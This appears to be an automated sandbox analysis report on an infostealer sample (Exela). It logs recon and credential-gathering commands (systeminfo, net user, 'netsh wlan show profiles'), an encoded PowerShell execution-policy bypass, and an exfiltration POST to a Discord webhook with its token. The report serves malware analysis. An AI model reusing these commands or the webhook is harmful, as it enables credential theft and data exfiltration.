echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\rename_me_before.exe", ParentImage: C:\Users\user\Desktop\rename_me_before.exe, ParentProcessId: 3512, ParentProcessName: rename_me_before.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administ
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7624, ProcessName: svchost.exe

            Data Obfuscation

            Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

            Stealing of Sensitive Information

            Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\rename_me_before.exe", ParentImage: C:\Users\user\Desktop\rename_me_before.exe, ParentProcessId: 3512, ParentProcessName: rename_me_before.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", ProcessId: 7256, ProcessName: cmd.exe
            No Suricata rule has matched



            AV Detection

            Source: rename_me_before.exe; Avira: detected
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe; Avira: detection malicious, Label: TR/Redcap.woxyt
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe; ReversingLabs: Detection: 57%
            Source: rename_me_before.exe; Virustotal: Detection: 67%
            Source: rename_me_before.exe; ReversingLabs: Detection: 50%
            Source: Submitted Sample; Integrated Neural Analysis Model: Matched 97.5% probability

            Phishing

            Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\net.exe; Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\net.exe; Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: rename_me_before.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.pdb source: powershell.exe, 00000045.00000002.1826414031.000001DBC0644000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, _uuid.pyd.0.dr
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.pdbhP source: powershell.exe, 00000045.00000002.1826414031.000001DBC0644000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \ia.pdbc source: powershell.exe, 00000045.00000002.1848424397.000001DBD74B3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: rename_me_before.exe, 00000000.00000003.1659342426.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, VCRUNTIME140.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: rename_me_before.exe, 00000000.00000003.1659342426.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, VCRUNTIME140.dll.0.dr
            Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: rename_me_before.exe, 00000000.00000003.1664519798.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1981233285.000001B17FDC0000.00000002.00000001.01000000.00000006.sdmp

            Spreading

            Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Users\user\Desktop\rename_me_before.exe; Code function: 0_2_00007FF6404E79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6404E79B0
            Source: C:\Users\user\Desktop\rename_me_before.exe; Code function: 0_2_00007FF6404E85A0 FindFirstFileExW,FindClose,0_2_00007FF6404E85A0
            Source: C:\Users\user\Desktop\rename_me_before.exe; Code function: 0_2_00007FF640500B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF640500B84
            Source: C:\Users\user\Desktop\rename_me_before.exe; Code function: 1_2_00007FF6404E85A0 FindFirstFileExW,FindClose,1_2_00007FF6404E85A0
            Source: C:\Users\user\Desktop\rename_me_before.exe; Code function: 1_2_00007FF6404E79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF6404E79B0
            Source: C:\Users\user\Desktop\rename_me_before.exe; Code function: 1_2_00007FF640500B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF640500B84
            Source: C:\Users\user\Desktop\rename_me_before.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
            Source: C:\Users\user\Desktop\rename_me_before.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
            Source: C:\Users\user\Desktop\rename_me_before.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales
            Source: C:\Users\user\Desktop\rename_me_before.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css
            Source: C:\Users\user\Desktop\rename_me_before.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
            Source: C:\Users\user\Desktop\rename_me_before.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg

            Networking

            Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: Joe Sandbox View; IP Address: 208.95.112.1 208.95.112.1
            Source: Joe Sandbox View; IP Address: 162.159.137.232 162.159.137.232
            Source: unknown; DNS query: name: ip-api.com
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic; HTTP traffic detected: GET /getServer HTTP/1.1 | Host: api.gofile.io | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Python/3.11 aiohttp/3.9.5
            Source: global traffic; HTTP traffic detected: GET /json HTTP/1.1 | Host: ip-api.com | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Python/3.11 aiohttp/3.9.5
            Source: global traffic; DNS traffic detected: DNS query: ip-api.com
            Source: global traffic; DNS traffic detected: DNS query: canary.discord.com
            Source: global traffic; DNS traffic detected: DNS query: api.gofile.io
            Source: global traffic; DNS traffic detected: DNS query: store1.gofile.io
            Source: unknown; HTTP traffic detected: POST /api/webhooks/1263157181906419813/b4pV0iwlt5KWRU4QEOMzoONBAdBMW4nt-dNtrU5B2-50jsFyHabL0Uos8mtD0ZVFUQNS HTTP/1.1 | Host: canary.discord.com | Content-Type: application/json | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Python/3.11 aiohttp/3.9.5 | Content-Length: 1381
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.27.1 | Date: Wed, 01 Jan 2025 01:53:24 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 14 | Connection: close | Access-Control-Allow-Origin: * | Access-Control-Allow-Headers: Content-Type, Authorization | Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD | Access-Control-Allow-Credentials: true | Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests | Cross-Origin-Embedder-Policy: require-corp | Cross-Origin-Opener-Policy: same-origin | Cross-Origin-Resource-Policy: cross-origin | Origin-Agent-Cluster: ?1 | Referrer-Policy: no-referrer | Strict-Transport-Security: max-age=15552000; includeSubDomains | X-Content-Type-Options: nosniff | X-DNS-Prefetch-Control: off | X-Download-Options: noopen | X-Frame-Options: SAMEORIGIN | X-Permitted-Cross-Domain-Policies: none | X-XSS-Protection: 0 | ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
            Source: rename_me_before.exe, 00000000.00000003.1663922956.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digi
            Source: rename_me_before.exe, 00000000.00000003.1663581337.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.co
            Source: rename_me_before.exe, 00000000.00000003.1660090231.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663581337.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659883292.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659578842.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663922956.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660419536.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664519798.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A29D000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665318433.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A29F000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660005362.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659482389.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665125906.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A29D000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663988255.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, 
rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A29D000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659790847.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: rename_me_before.exe, 00000000.00000003.1660090231.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663581337.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659883292.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659578842.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663922956.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660419536.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664519798.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665318433.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660005362.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659482389.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665125906.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663988255.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659790847.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664664141.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, 
rename_me_before.exe, 00000000.00000003.1660274517.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664424670.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660916713.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: rename_me_before.exe, 00000000.00000003.1660090231.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663581337.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659883292.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659578842.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663922956.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660419536.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664519798.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665318433.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660005362.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659482389.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665125906.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663988255.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659790847.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664664141.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, 
rename_me_before.exe, 00000000.00000003.1660274517.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664424670.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660916713.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: rename_me_before.exe, 00000000.00000003.1660090231.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663581337.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659883292.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659578842.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663922956.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660419536.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664519798.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A29D000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665318433.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A29F000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660005362.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659482389.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665125906.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A29D000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663988255.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A29D000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659790847.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: svchost.exe, 0000002A.00000002.2920593241.000001D218A00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
            Source: rename_me_before.exe, 00000000.00000003.1660090231.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663581337.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659883292.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659578842.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663922956.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660419536.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664519798.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A29D000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665318433.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A29F000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660005362.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659482389.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665125906.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A29D000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663988255.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A29D000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659790847.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: rename_me_before.exe, 00000000.00000003.1660090231.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663581337.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659883292.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659578842.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663922956.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660419536.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664519798.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665318433.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660005362.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659482389.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665125906.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663988255.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659790847.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664664141.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660274517.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664424670.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660916713.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: rename_me_before.exe, 00000000.00000003.1660090231.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663581337.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659883292.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659578842.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663922956.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660419536.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664519798.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665318433.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660005362.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659482389.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665125906.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663988255.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659790847.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664664141.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660274517.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664424670.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660916713.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: libcrypto-3.dll.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: rename_me_before.exe, 00000000.00000003.1660090231.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663581337.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659883292.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659578842.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663922956.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660419536.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664519798.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665318433.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660005362.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659482389.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665125906.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663988255.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659790847.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 